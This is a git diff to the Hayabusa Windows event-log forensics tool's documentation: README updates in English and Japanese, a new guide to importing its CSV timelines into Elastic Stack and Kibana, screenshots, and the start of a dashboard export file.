diff --git a/README-Japanese.md b/README-Japanese.md index 7c1b86a3..be8d893b 100644 --- a/README-Japanese.md +++ b/README-Japanese.md @@ -18,7 +18,7 @@ # Hayabusa について -Hayabusaは、日本の[Yamato Security](https://yamatosecurity.connpass.com/)グループによって作られた**Windowsイベントログのファストフォレンジックタイムライン生成**および**スレットハンティングツール**です。 Hayabusaは日本語で[「ハヤブサ」](https://en.wikipedia.org/wiki/Peregrine_falcon)を意味し、ハヤブサが世界で最も速く、狩猟(hunting)に優れ、とても訓練しやすい動物であることから選ばれました。[Rust](https://www.rust-lang.org/) で開発され、マルチスレッドに対応し、可能な限り高速に動作するよう配慮されています。[Sigma](https://github.com/SigmaHQ/Sigma)ルールをHayabusaルール形式に変換する[ツール](https://github.com/Yamato-Security/hayabusa-rules/tree/main/tools/sigmac)も提供しています。Hayabusaの検知ルールもSigmaと同様にYML形式であり、カスタマイズ性や拡張性に優れます。稼働中のシステムで実行してライブ調査することも、複数のシステムからログを収集してオフライン調査することも可能です。(※現時点では、リアルタイムアラートや定期的なスキャンには対応していません。) 出力は一つのCSVタイムラインにまとめられ、Excelや[Timeline Explorer](https://ericzimmerman.github.io/#!index.md)で簡単に分析できるようになります。 +Hayabusaは、日本の[Yamato Security](https://yamatosecurity.connpass.com/)グループによって作られた**Windowsイベントログのファストフォレンジックタイムライン生成**および**スレットハンティングツール**です。 Hayabusaは日本語で[「ハヤブサ」](https://en.wikipedia.org/wiki/Peregrine_falcon)を意味し、ハヤブサが世界で最も速く、狩猟(hunting)に優れ、とても訓練しやすい動物であることから選ばれました。[Rust](https://www.rust-lang.org/) で開発され、マルチスレッドに対応し、可能な限り高速に動作するよう配慮されています。[Sigma](https://github.com/SigmaHQ/Sigma)ルールをHayabusaルール形式に変換する[ツール](https://github.com/Yamato-Security/hayabusa-rules/tree/main/tools/sigmac)も提供しています。Hayabusaの検知ルールもSigmaと同様にYML形式であり、カスタマイズ性や拡張性に優れます。稼働中のシステムで実行してライブ調査することも、複数のシステムからログを収集してオフライン調査することも可能です。(※現時点では、リアルタイムアラートや定期的なスキャンには対応していません。) 出力は一つのCSVタイムラインにまとめられ、Excel、[Timeline Explorer](https://ericzimmerman.github.io/#!index.md)、[Elastic Stack](doc/ElasticStackImport/ElasticStackImport-English.md)等で簡単に分析できるようになります。 ## 目次 @@ -34,6 +34,7 @@ Hayabusaは、日本の[Yamato Security](https://yamatosecurity.connpass.com/) - [Excelでの解析:](#excelでの解析) - [Timeline Explorerでの解析:](#timeline-explorerでの解析) - [Criticalアラートのフィルタリングとコンピュータごとのグルーピング:](#criticalアラートのフィルタリングとコンピュータごとのグルーピング) + - [Elastic Stackダッシュボード](#elastic-stackダッシュボード) - [タイムラインのサンプル結果](#タイムラインのサンプル結果) - [特徴&機能](#特徴機能) - [予定されている機能](#予定されている機能) @@ -54,6 +55,7 @@ Hayabusaは、日本の[Yamato Security](https://yamatosecurity.connpass.com/) - [ピボットキーワードの作成](#ピボットキーワードの作成) - [サンプルevtxファイルでHayabusaをテストする](#サンプルevtxファイルでhayabusaをテストする) - [Hayabusaの出力](#hayabusaの出力) + - [MITRE ATT&CK戦術の省略](#mitre-attck戦術の省略) - [プログレスバー](#プログレスバー) - [標準出力へのカラー設定](#標準出力へのカラー設定) - [Hayabusaルール](#hayabusaルール) @@ -76,7 +78,7 @@ Hayabusaは、日本の[Yamato Security](https://yamatosecurity.connpass.com/) ### スレット(脅威)ハンティング -Hayabusa には現在、1300以上のSigmaルールと約70のHayabusa検知ルールがあり、定期的にルールが追加されています。 最終的な目標はインシデントレスポンスや定期的なスレットハンティングのために、HayabusaエージェントをすべてのWindows端末にインストールして、中央サーバーにアラートを返す仕組みを作ることです。 +Hayabusaには現在、2200以上のSigmaルールと約125のHayabusa検知ルールがあり、定期的にルールが追加されています。 最終的な目標はインシデントレスポンスや定期的なスレットハンティングのために、HayabusaエージェントをすべてのWindows端末にインストールして、中央サーバーにアラートを返す仕組みを作ることです。 ### フォレンジックタイムラインの高速生成 @@ -108,16 +110,24 @@ Windowsのイベントログは、 ![Hayabusa Timeline Explorerでの解析](screenshots/TimelineExplorer-ColoredTimeline.png) -## Criticalアラートのフィルタリングとコンピュータごとのグルーピング: +## Criticalアラートのフィルタリングとコンピュータごとのグルーピング: ![Timeline ExplorerでCriticalアラートのフィルタリングとコンピュータグルーピング](screenshots/TimelineExplorer-CriticalAlerts-ComputerGrouping.png) +## Elastic Stackダッシュボード + +![Elastic Stack Dashboard 1](doc/ElasticStackImport/17-HayabusaDashboard-1.png) + +![Elastic Stack Dashboard 2](doc/ElasticStackImport/18-HayabusaDashboard-2.png) + # タイムラインのサンプル結果 CSVのタイムライン結果のサンプルは[こちら](https://github.com/Yamato-Security/hayabusa/tree/main/sample-results)で確認できます。 CSVのタイムラインをExcelやTimeline Explorerで分析する方法は[こちら](doc/CSV-AnalysisWithExcelAndTimelineExplorer-Japanese.pdf)で紹介しています。 +CSVのタイムラインをElastic Stackにインポートする方法は[こちら](doc/ElasticStackImport/ElasticStackImport-English.md)で紹介しています。(現在、英語のみ) + # 特徴&機能 * クロスプラットフォーム対応: Windows, Linux, macOS。 @@ -132,15 +142,13 @@ CSVのタイムラインをExcelやTimeline Explorerで分析する方法は[こ * MITRE ATT&CKとのマッピング (CSVの出力ファイルのみ)。 * ルールレベルのチューニング。 * イベントログから不審なユーザやファイルを素早く特定するのに有用な、ピボットキーワードの一覧作成。 +* 詳細な調査のために全フィールド情報の出力。 # 予定されている機能 * すべてのエンドポイントでの企業全体のスレットハンティング。 -* 日本語対応。 * MITRE ATT&CKのヒートマップ生成機能。 * ユーザーログオンと失敗したログオンのサマリー。 -* JSONログからの入力。 -* JSONへの出力→Elastic Stack/Splunkへのインポート。 # ダウンロード @@ -292,6 +300,7 @@ macOSの環境設定から「セキュリティとプライバシー」を開き USAGE: -d --directory=[DIRECTORY] '.evtxファイルを持つディレクトリのパス。' -f --filepath=[FILEPATH] '1つの.evtxファイルのパス。' + -F --full-data '全てのフィールド情報を出力する。' -r --rules=[RULEFILE/RULEDIRECTORY] 'ルールファイルまたはルールファイルを持つディレクトリ。(デフォルト: ./rules)' -c --color 'カラーで出力する。 (ターミナルはTrue Colorに対応する必要がある。)' -C --config=[RULECONFIGDIRECTORY] 'ルールフォルダのコンフィグディレクトリ(デフォルト: ./rules/config)' @@ -330,10 +339,10 @@ hayabusa.exe -f eventlog.evtx hayabusa.exe -d .\hayabusa-sample-evtx ``` -* 1つのCSVファイルにエクスポートして、ExcelやTimeline Explorerでさらに分析することができます: +* 全てのフィールド情報も含めて1つのCSVファイルにエクスポートして、Excel、Timeline Explorer、Elastic Stack等でさらに分析することができます: ```bash -hayabusa.exe -d .\hayabusa-sample-evtx -o results.csv +hayabusa.exe -d .\hayabusa-sample-evtx -o results.csv -F ``` * Hayabusaルールのみを実行します(デフォルトでは `-r .\rules` にあるすべてのルールが利用されます): @@ -456,11 +465,34 @@ Hayabusaの結果を標準出力に表示しているとき(デフォルト) * `Title`: YML検知ルールの`title`フィールドから来ています。 * `Details`: YML検知ルールの`details`フィールドから来ていますが、このフィールドはHayabusaルールにしかありません。このフィールドはアラートとイベントに関する追加情報を提供し、ログの``部分から有用なデータを抽出することができます。 -CSVファイルとして保存する場合、以下の2つのフィールドが追加されます: +CSVファイルとして保存する場合、以下の列が追加されます: +* `MitreAttack`: MITRE ATT&CKの戦術。 * `Rule Path`: アラートまたはイベントを生成した検知ルールへのパス。 * `File Path`: アラートまたはイベントを起こしたevtxファイルへのパス。 +`-F`もしくは`--full-data`オプションを指定した場合、全てのフィールド情報が新しいカラムで出力されます。 + +## MITRE ATT&CK戦術の省略 + +簡潔に出力するためにMITRE ATT&CKの戦術を以下のように省略しています。 +`config/output_tag.txt`の設定ファイルで自由に編集できます。 + +* `Recon` : Reconnaissance (偵察) +* `ResDev` : Resource Development (リソース開発) +* `InitAccess` : Initial Access (初期アクセス) +* `Exec` : Execution (実行) +* `Persis` : Persistence (永続化) +* `PrivEsc` : Privilege Escalation (権限昇格) +* `Evas` : Defense Evasion (防御回避) +* `CredAccess` : Credential Access (認証情報アクセス) +* `Disc` : Discovery (探索) +* `LatMov` : Lateral Movement (横展開) +* `Collect` : Collection (収集) +* `C2` : Command and Control (遠隔操作) +* `Exfil` : Exfiltration (持ち出し) +* `Impact` : Impact (影響) + ## プログレスバー プログレス・バーは、複数のevtxファイルに対してのみ機能します。 @@ -502,11 +534,14 @@ Hayabusaルールのディレクトリ構造は、3つのディレクトリに ## Hayabusa v.s. 変換されたSigmaルール -Sigmaルールは、最初にHayabusaルール形式に変換する必要があります。変換のやり方は[ここ](https://github.com/Yamato-Security/hayabusa-rules/tree/main/tools/sigmac/README-Japanese.md)で説明されています。Hayabusaルールは、Windowsのイベントログ解析専用に設計されており、以下のような利点があります: +Sigmaルールは、最初にHayabusaルール形式に変換する必要があります。変換のやり方は[ここ](https://github.com/Yamato-Security/hayabusa-rules/tree/main/tools/sigmac/README-Japanese.md)で説明されています。 +殆どのルールはSigmaルールと互換性があるので、Sigmaルールのようにその他のSIEM形式に変換できます。 +Hayabusaルールは、Windowsのイベントログ解析専用に設計されており、以下のような利点があります: 1. ログの有用なフィールドのみから抽出された追加情報を表示するための `details`フィールドを追加しています。 2. Hayabusaルールはすべてサンプルログに対してテストされ、検知することが確認されています。 > 変換処理のバグ、サポートされていない機能、実装の違い(正規表現など)により、一部のSigmaルールは意図したとおりに動作しない可能性があります。 +3. Sigmaルール仕様にない集計式(例:`|equalsfield`)の利用。 **制限事項**: 私たちの知る限り、Hayabusa はオープンソースの Windows イベントログ解析ツールの中でSigmaルールを最も多くサポートしていますが、まだサポートされていないルールもあります。 diff --git a/README.md b/README.md index 350585ad..07a69398 100644 --- a/README.md +++ b/README.md @@ -18,7 +18,7 @@ # About Hayabusa -Hayabusa is a **Windows event log fast forensics timeline generator** and **threat hunting tool** created by the [Yamato Security](https://yamatosecurity.connpass.com/) group in Japan. Hayabusa means ["peregrine falcon"](https://en.wikipedia.org/wiki/Peregrine_falcon") in Japanese and was chosen as peregrine falcons are the fastest animal in the world, great at hunting and highly trainable. It is written in [Rust](https://www.rust-lang.org/) and supports multi-threading in order to be as fast as possible. We have provided a [tool](https://github.com/Yamato-Security/hayabusa-rules/tree/main/tools/sigmac) to convert [sigma](https://github.com/SigmaHQ/sigma) rules into hayabusa rule format. The hayabusa detection rules, like sigma, are also written in YML in order to be as easily customizable and extensible as possible. It can be run either on running systems for live analysis or by gathering logs from multiple systems for offline analysis. (At the moment, it does not support real-time alerting or periodic scans.) The output will be consolidated into a single CSV timeline for easy analysis in Excel or [Timeline Explorer](https://ericzimmerman.github.io/#!index.md). +Hayabusa is a **Windows event log fast forensics timeline generator** and **threat hunting tool** created by the [Yamato Security](https://yamatosecurity.connpass.com/) group in Japan. Hayabusa means ["peregrine falcon"](https://en.wikipedia.org/wiki/Peregrine_falcon") in Japanese and was chosen as peregrine falcons are the fastest animal in the world, great at hunting and highly trainable. It is written in [Rust](https://www.rust-lang.org/) and supports multi-threading in order to be as fast as possible. We have provided a [tool](https://github.com/Yamato-Security/hayabusa-rules/tree/main/tools/sigmac) to convert [sigma](https://github.com/SigmaHQ/sigma) rules into hayabusa rule format. The hayabusa detection rules are based on sigma rules, written in YML in order to be as easily customizable and extensible as possible. It can be run either on running systems for live analysis or by gathering logs from multiple systems for offline analysis. (At the moment, it does not support real-time alerting or periodic scans.) The output will be consolidated into a single CSV timeline for easy analysis in Excel, [Timeline Explorer](https://ericzimmerman.github.io/#!index.md), or [Elastic Stack](doc/ElasticStackImport/ElasticStackImport-English.md). ## Table of Contents @@ -34,7 +34,8 @@ Hayabusa is a **Windows event log fast forensics timeline generator** and **thre - [Analysis in Excel](#analysis-in-excel) - [Analysis in Timeline Explorer](#analysis-in-timeline-explorer) - [Critical Alert Filtering and Computer Grouping in Timeline Explorer](#critical-alert-filtering-and-computer-grouping-in-timeline-explorer) -- [Sample Timeline Results](#sample-timeline-results) + - [Elastic Stack Dashboard](#elastic-stack-dashboard) +- [Analyzing Sample Timeline Results](#analyzing-sample-timeline-results) - [Features](#features) - [Planned Features](#planned-features) - [Downloads](#downloads) @@ -54,6 +55,7 @@ Hayabusa is a **Windows event log fast forensics timeline generator** and **thre - [Pivot Keyword Generator](#pivot-keyword-generator) - [Testing Hayabusa on Sample Evtx Files](#testing-hayabusa-on-sample-evtx-files) - [Hayabusa Output](#hayabusa-output) + - [MITRE ATT&CK Tactics Abbreviations](#mitre-attck-tactics-abbreviations) - [Progress Bar](#progress-bar) - [Color Output](#color-output) - [Hayabusa Rules](#hayabusa-rules) @@ -76,7 +78,7 @@ Hayabusa is a **Windows event log fast forensics timeline generator** and **thre ### Threat Hunting -Hayabusa currently has over 1300 sigma rules and around 70 hayabusa rules with more rules being added regularly. The ultimate goal is to be able to push out hayabusa agents to all Windows endpoints after an incident or for periodic threat hunting and have them alert back to a central server. +Hayabusa currently has over 2200 sigma rules and around 125 hayabusa rules with more rules being added regularly. The ultimate goal is to be able to push out hayabusa agents to all Windows endpoints after an incident or for periodic threat hunting and have them alert back to a central server. ### Fast Forensics Timeline Generation @@ -110,12 +112,20 @@ Hayabusa is not intended to be a replacement for tools like [Evtx Explorer](http ![Critical alert filtering and computer grouping in Timeline Explorer](screenshots/TimelineExplorer-CriticalAlerts-ComputerGrouping.png) -# Sample Timeline Results +## Elastic Stack Dashboard -You can check out sample CSV timelines [here](https://github.com/Yamato-Security/hayabusa/tree/main/sample-results). +![Elastic Stack Dashboard 1](doc/ElasticStackImport/17-HayabusaDashboard-1.png) + +![Elastic Stack Dashboard 2](doc/ElasticStackImport/18-HayabusaDashboard-2.png) + +# Analyzing Sample Timeline Results + +You can check out a sample CSV timeline [here](https://github.com/Yamato-Security/hayabusa/tree/main/sample-results). You can learn how to analyze CSV timelines in Excel and Timeline Explorer [here](doc/CSV-AnalysisWithExcelAndTimelineExplorer-English.pdf). +You can learn how to import CSV files into Elastic Stack [here](doc/ElasticStackImport/ElasticStackImport-English.md). + # Features * Cross-platform support: Windows, Linux, macOS. @@ -124,21 +134,19 @@ You can learn how to analyze CSV timelines in Excel and Timeline Explorer [here] * Creates a single easy-to-analyze CSV timeline for forensic investigations and incident response. * Threat hunting based on IoC signatures written in easy to read/create/edit YML based hayabusa rules. * Sigma rule support to convert sigma rules to hayabusa rules. -* Currently it supports the most sigma rules compared to other similar tools and even supports count rules. +* Currently it supports the most sigma rules compared to other similar tools and even supports count rules and new aggregators such as `|equalsfield`. * Event log statistics. (Useful for getting a picture of what types of events there are and for tuning your log settings.) * Rule tuning configuration by excluding unneeded or noisy rules. * MITRE ATT&CK mapping of tactics (only in saved CSV files). * Rule level tuning. * Create a list of unique pivot keywords to quickly identify abnormal users, hostnames, processes, etc... as well as correlate events. +* Output all fields for more thorough investigations. # Planned Features * Enterprise-wide hunting on all endpoints. -* Japanese language support. * MITRE ATT&CK heatmap generation. * User logon and failed logon summary. -* Input from JSON logs. -* JSON support for sending alerts to Elastic Stack/Splunk, etc... # Downloads @@ -210,7 +218,7 @@ sudo yum install openssl-devel ## Advanced: Updating Rust Packages -You can update to the latest Rust crates before compiling to get the latest libraries: +You can update to the latest Rust crates before compiling: ```bash cargo update @@ -285,6 +293,7 @@ You should now be able to run hayabusa. USAGE: -d --directory=[DIRECTORY] 'Directory of multiple .evtx files.' -f --filepath=[FILEPATH] 'File path to one .evtx file.' + -F --full-data 'Print all field information.' -r --rules=[RULEFILE/RULEDIRECTORY] 'Rule file or directory. (Default: ./rules)' -c --color 'Output with color. (Terminal needs to support True Color.)' -C --config=[RULECONFIGDIRECTORY] 'Rule config folder. (Default: ./rules/config)' @@ -323,10 +332,10 @@ hayabusa.exe -f eventlog.evtx hayabusa.exe -d .\hayabusa-sample-evtx ``` -* Export to a single CSV file for further analysis with excel or timeline explorer: +* Export to a single CSV file for further analysis with excel, timeline explorer, elastic stack, etc... and include all field information: ```bash -hayabusa.exe -d .\hayabusa-sample-evtx -o results.csv +hayabusa.exe -d .\hayabusa-sample-evtx -o results.csv -F ``` * Only run hayabusa rules (the default is to run all the rules in `-r .\rules`): @@ -449,11 +458,34 @@ When hayabusa output is being displayed to the screen (the default), it will dis * `Title`: This comes from the `title` field in the YML detection rule. * `Details`: This comes from the `details` field in the YML detection rule, however, only hayabusa rules have this field. This field gives extra information about the alert or event and can extract useful data from the `` portion of the log. For example, usernames, command line information, process information, etc... -When saving to a CSV file an additional two fields will be added: +The following additional columns will be added to the output when saving to a CSV file: +* `MitreAttack`: MITRE ATT&CK tactics. * `Rule Path`: The path to the detection rule that generated the alert or event. * `File Path`: The path to the evtx file that caused the alert or event. +If you add the `-F` or `--full-data` option, a new column with all field information will also be added. + +## MITRE ATT&CK Tactics Abbreviations + +In order to save space, we use the following abbreviations when displaying MITRE ATT&CK tactics. +You can freely edit these abbreviations in the `config/output_tag.txt` configuration file. + +* `Recon` : Reconnaissance +* `ResDev` : Resource Development +* `InitAccess` : Initial Access +* `Exec` : Execution +* `Persis` : Persistence +* `PrivEsc` : Privilege Escalation +* `Evas` : Defense Evasion +* `CredAccess` : Credential Access +* `Disc` : Discovery +* `LatMov` : Lateral Movement +* `Collect` : Collection +* `C2` : Command and Control +* `Exfil` : Exfiltration +* `Impact` : Impact + ## Progress Bar The progress bar will only work with multiple evtx files. @@ -480,7 +512,7 @@ The hayabusa rule directory structure is separated into 3 directories: * `default`: logs that are turned on in Windows by default. * `non-default`: logs that need to be turned on through group policy, security baselines, etc... * `sysmon`: logs that are generated by [sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon). -* `testing`: a temporary directory to put rules that you are currently testing +* `testing`: a temporary directory to put rules that you are currently testing. Rules are further seperated into directories by log type (Example: Security, System, etc...) and are named in the following format: @@ -493,11 +525,14 @@ Please check out the current rules to use as a template in creating new ones or ## Hayabusa v.s. Converted Sigma Rules -Sigma rules need to first be converted to hayabusa rule format explained [here](https://github.com/Yamato-Security/hayabusa-rules/blob/main/tools/sigmac/README.md). Hayabusa rules are designed solely for Windows event log analysis and have the following benefits: +Sigma rules need to first be converted to hayabusa rule format explained [here](https://github.com/Yamato-Security/hayabusa-rules/blob/main/tools/sigmac/README.md). +Most rules are compatible with the sigma format so you can use them just like sigma rules to convert to other SIEM formats. +Hayabusa rules are designed solely for Windows event log analysis and have the following benefits: 1. An extra `details` field to display additional information taken from only the useful fields in the log. 2. They are all tested against sample logs and are known to work. > Some sigma rules may not work as intended due to bugs in the conversion process, unsupported features, or differences in implementation (such as in regular expressions). +3. Extra aggregators not found in sigma, such as `|equalsfield`. **Limitations**: To our knowledge, hayabusa provides the greatest support for sigma rules out of any open source Windows event log analysis tool, however, there are still rules that are not supported: diff --git a/doc/ElasticStackImport/01-SOF-ELK-Bootup.png b/doc/ElasticStackImport/01-SOF-ELK-Bootup.png new file mode 100644 index 00000000..b37c8e31 Binary files /dev/null and b/doc/ElasticStackImport/01-SOF-ELK-Bootup.png differ diff --git a/doc/ElasticStackImport/02-Kibana.png b/doc/ElasticStackImport/02-Kibana.png new file mode 100644 index 00000000..7a70aab7 Binary files /dev/null and b/doc/ElasticStackImport/02-Kibana.png differ diff --git a/doc/ElasticStackImport/03-Integrations.png b/doc/ElasticStackImport/03-Integrations.png new file mode 100644 index 00000000..719e2ee6 Binary files /dev/null and b/doc/ElasticStackImport/03-Integrations.png differ diff --git a/doc/ElasticStackImport/04-IntegrationsImportCSV.png b/doc/ElasticStackImport/04-IntegrationsImportCSV.png new file mode 100644 index 00000000..de835d7b Binary files /dev/null and b/doc/ElasticStackImport/04-IntegrationsImportCSV.png differ diff --git a/doc/ElasticStackImport/05-OverrideSettings.png b/doc/ElasticStackImport/05-OverrideSettings.png new file mode 100644 index 00000000..dd4926e0 Binary files /dev/null and b/doc/ElasticStackImport/05-OverrideSettings.png differ diff --git a/doc/ElasticStackImport/06-OverrideSettingsConfig.png b/doc/ElasticStackImport/06-OverrideSettingsConfig.png new file mode 100644 index 00000000..b18ddb10 Binary files /dev/null and b/doc/ElasticStackImport/06-OverrideSettingsConfig.png differ diff --git a/doc/ElasticStackImport/07-CSV-Import.png b/doc/ElasticStackImport/07-CSV-Import.png new file mode 100644 index 00000000..e9a49c87 Binary files /dev/null and b/doc/ElasticStackImport/07-CSV-Import.png differ diff --git a/doc/ElasticStackImport/08-ImportDataSettings.png b/doc/ElasticStackImport/08-ImportDataSettings.png new file mode 100644 index 00000000..c4f9374c Binary files /dev/null and b/doc/ElasticStackImport/08-ImportDataSettings.png differ diff --git a/doc/ElasticStackImport/09-ImportFinish.png b/doc/ElasticStackImport/09-ImportFinish.png new file mode 100644 index 00000000..5397c31a Binary files /dev/null and b/doc/ElasticStackImport/09-ImportFinish.png differ diff --git a/doc/ElasticStackImport/10-Discover.png b/doc/ElasticStackImport/10-Discover.png new file mode 100644 index 00000000..acc4d1bf Binary files /dev/null and b/doc/ElasticStackImport/10-Discover.png differ diff --git a/doc/ElasticStackImport/11-Dashboard.png b/doc/ElasticStackImport/11-Dashboard.png new file mode 100644 index 00000000..4af4a7d6 Binary files /dev/null and b/doc/ElasticStackImport/11-Dashboard.png differ diff --git a/doc/ElasticStackImport/12-AddingColumns.png b/doc/ElasticStackImport/12-AddingColumns.png new file mode 100644 index 00000000..f52dae1e Binary files /dev/null and b/doc/ElasticStackImport/12-AddingColumns.png differ diff --git a/doc/ElasticStackImport/13-RecommendedColumns.png b/doc/ElasticStackImport/13-RecommendedColumns.png new file mode 100644 index 00000000..1b063368 Binary files /dev/null and b/doc/ElasticStackImport/13-RecommendedColumns.png differ diff --git a/doc/ElasticStackImport/14-DicoverWithColumns.png b/doc/ElasticStackImport/14-DicoverWithColumns.png new file mode 100644 index 00000000..ff69126a Binary files /dev/null and b/doc/ElasticStackImport/14-DicoverWithColumns.png differ diff --git a/doc/ElasticStackImport/15-HayabusaDashboard-StackManagement.png b/doc/ElasticStackImport/15-HayabusaDashboard-StackManagement.png new file mode 100644 index 00000000..222abec6 Binary files /dev/null and b/doc/ElasticStackImport/15-HayabusaDashboard-StackManagement.png differ diff --git a/doc/ElasticStackImport/16-HayabusaDashboard-Import.png b/doc/ElasticStackImport/16-HayabusaDashboard-Import.png new file mode 100644 index 00000000..d28485c1 Binary files /dev/null and b/doc/ElasticStackImport/16-HayabusaDashboard-Import.png differ diff --git a/doc/ElasticStackImport/17-HayabusaDashboard-1.png b/doc/ElasticStackImport/17-HayabusaDashboard-1.png new file mode 100644 index 00000000..5f5f2896 Binary files /dev/null and b/doc/ElasticStackImport/17-HayabusaDashboard-1.png differ diff --git a/doc/ElasticStackImport/18-HayabusaDashboard-2.png b/doc/ElasticStackImport/18-HayabusaDashboard-2.png new file mode 100644 index 00000000..0a5cee5e Binary files /dev/null and b/doc/ElasticStackImport/18-HayabusaDashboard-2.png differ diff --git a/doc/ElasticStackImport/ElasticStackImport-English.md b/doc/ElasticStackImport/ElasticStackImport-English.md new file mode 100644 index 00000000..4a8c96a3 --- /dev/null +++ b/doc/ElasticStackImport/ElasticStackImport-English.md @@ -0,0 +1,130 @@ +# Importing Results Into Elastic Stack + +## Start an elastic stack distribution + +Hayabusa results can easily be imported into Elastic Stack. We recommend using [SOF-ELK](https://github.com/philhagen/sof-elk/blob/main/VM_README.md), a free elastic stack Linux distro focused on DFIR investigations. + +First download and unzip the SOF-ELK 7-zipped VMware image from [http://for572.com/sof-elk-vm](http://for572.com/sof-elk-vm). + +* Username: `elk_user` +* Password: `forensics` + +When you boot up the VM, you will get a screen similar to below: + +![SOF-ELK Bootup](01-SOF-ELK-Bootup.png) + +Open Kibana in a web browser according to the URL displayed. For example: http://172.16.62.130:5601/ + +>> Note: it may take a while for Kibana to load. + +You should see a webpage as follows: + +![SOF-ELK Kibana](02-Kibana.png) + +## Import the CSV results + +Click the sidebar icon in top-lefthand corner and open `Integrations`. + +![Integrations](03-Integrations.png) + +Type in `csv` in the search bar and click `Upload a file`: + +![CSV Upload](04-IntegrationsImportCSV.png) + +After uploading the CSV file, click `Override settings` to specify the correct timestamp format: + +![Override Settings](05-OverrideSettings.png) + +As shown below, perform the following changes and then click `Apply`: + +1. Change `Timestamp format` to `custom`. +2. Specify the format as `yyyy-MM-dd HH:mm:ss.SSS XXX` +3. Change the `Time field` to `Timestamp`. + +![Override Settings Config](06-OverrideSettingsConfig.png) + +Now click `Import` in the bottom left-hand corner. + +![CSV Import](07-CSV-Import.png) + +As shown below, click on `Advanced` and perform the following settings before clicking `Import`: + +1. Title the `Index name` as `evtxlogs-hayabusa`. +2. Under `Index settings`, add `, "number_of_replicas": 0` so that the index health status does not turn yellow. +3. Under `Mappings`, change the `RuleTitle` type of `text` to `keyword` so that we can do statistics on the rule titles and change the `EventID` type of `long` to `keyword` in order to import without errors. +4. Under `Ingest pipeline`, add `, "field": "Timestamp"` under the `remove` section. Timestamps will be displayed as `@timestamp` so this duplicate field is not needed. Also, delete the following in order to import without errors: + ``` + { + "convert": { + "field": "EventID", + "type": "long", + "ignore_missing": true + } + }, + ``` + +Settings should look similar to below: + +![Import Data Settings](08-ImportDataSettings.png) + +After importing, you should receive something similar to below: + +![Import Finish](09-ImportFinish.png) + +You can now click `View index in Discover` to view the results. + +## Analyzing results + +The default Discover view should look similar to this: + +![Discover View](10-Discover.png) + +You can get an overview of when the events happened and frequency of events by looking at the histogram at top. + +In the left-side sidebar, you can add fields you want to display in the columns by clicking the plus sign after hovering over a field: + +![Adding Columns](12-AddingColumns.png) + +To start off, we recommend the following columns: + +![Recommended Columns](13-RecommendedColumns.png) + +Your Discover view should now look like this: + +![Discover With Columns](14-DicoverWithColumns.png) + +You can filter with KQL to search for certain events and alerts. For example: + * `Level: "critical"`: Just show critical alerts. + * `Level: "critical" or Level: "high"`: Show high and critical alerts. + * `NOT Level:info`: Do not show informational events, only alerts. + * `*LatMov*`: Show events and alerts related to lateral movement. + * `"Password Spray"`: Only show specific attacks such as "Password Spray". + * `"LID: 0x8724ead"`: Display all activity associated with Logon ID 0x8724ead. + +## Hayabusa Dashboard + +We have exported a simple Hayabusa Dashboard in JSON to download [here](https://github.com/Yamato-Security/hayabusa/blob/main/doc/ElasticStackImport/HayabusaDashboard.ndjson) + +To import the dashboard, open the left sidebar and click `Stack Management` under `Management`. + +![Stack Management](15-HayabusaDashboard-StackManagement.png) + +After clicking `Saved Objects`, please click `Import` in the upper right-hand corner and import the Hayabusa Dashboard JSON file you downloaded. + +![Import Dashboard](16-HayabusaDashboard-Import.png) + +You should now be able to use the dashboard shown below: + +![Hayabusa Dashboard-1](17-HayabusaDashboard-1.png) + +![Hayabussa Dashboard-2](18-HayabusaDashboard-2.png) + +## Future Plans + +We plan on creating Hayabusa logstash parsers and a dashboard pre-built for SOF-ELK so that all you will need to do is copy the CSV results file to a directory in order to ingest the logs. + +## Acknowledgements + +Much of this documentation was taken from the blog write-up in Japanese from @kzzzzo2 [here](https://qiita.com/kzzzzo2/items/ead8ccc77b7609143749). + +Many thanks to @kzzzzo2! \ No newline at end of file diff --git a/doc/ElasticStackImport/HayabusaDashboard.ndjson b/doc/ElasticStackImport/HayabusaDashboard.ndjson new file mode 100644 index 00000000..262a8615 --- /dev/null +++ b/doc/ElasticStackImport/HayabusaDashboard.ndjson @@ -0,0 +1,4 @@ +{"attributes":{"fieldAttrs":"{\"Computer\":{\"count\":3},\"Details\":{\"count\":3},\"EventID\":{\"count\":3},\"Level\":{\"count\":4},\"MitreAttack\":{\"count\":3},\"RuleTitle\":{\"count\":3}}","fields":"[]","runtimeFieldMap":"{}","timeFieldName":"@timestamp","title":"evtxlogs-hayabusa","typeMeta":"{}"},"coreMigrationVersion":"7.17.1","id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","migrationVersion":{"index-pattern":"7.11.0"},"references":[],"type":"index-pattern","updated_at":"2022-04-15T00:28:01.828Z","version":"WzExNjAsM10="} +{"attributes":{"columns":["Computer","EventID","Level","MitreAttack","RuleTitle","Details"],"description":"","grid":{},"hideChart":false,"kibanaSavedObjectMeta":{"searchSourceJSON":"{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"},"sort":[["@timestamp","desc"]],"title":"Hayabusa Discover"},"coreMigrationVersion":"7.17.1","id":"d0e3ad60-bc6a-11ec-b4f7-8347b07fe863","migrationVersion":{"search":"7.9.3"},"references":[{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"kibanaSavedObjectMeta.searchSourceJSON.index","type":"index-pattern"}],"type":"search","updated_at":"2022-04-15T03:19:09.878Z","version":"WzE2NzAsM10="} +{"attributes":{"description":"","hits":0,"kibanaSavedObjectMeta":{"searchSourceJSON":"{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"},"optionsJSON":"{\"useMargins\":true,\"syncColors\":false,\"hidePanelTitles\":false}","panelsJSON":"[{\"version\":\"7.17.1\",\"type\":\"lens\",\"gridData\":{\"x\":0,\"y\":0,\"w\":12,\"h\":17,\"i\":\"1af33197-eac8-463d-ae7e-3b8a89568122\"},\"panelIndex\":\"1af33197-eac8-463d-ae7e-3b8a89568122\",\"embeddableConfig\":{\"attributes\":{\"title\":\"Risk 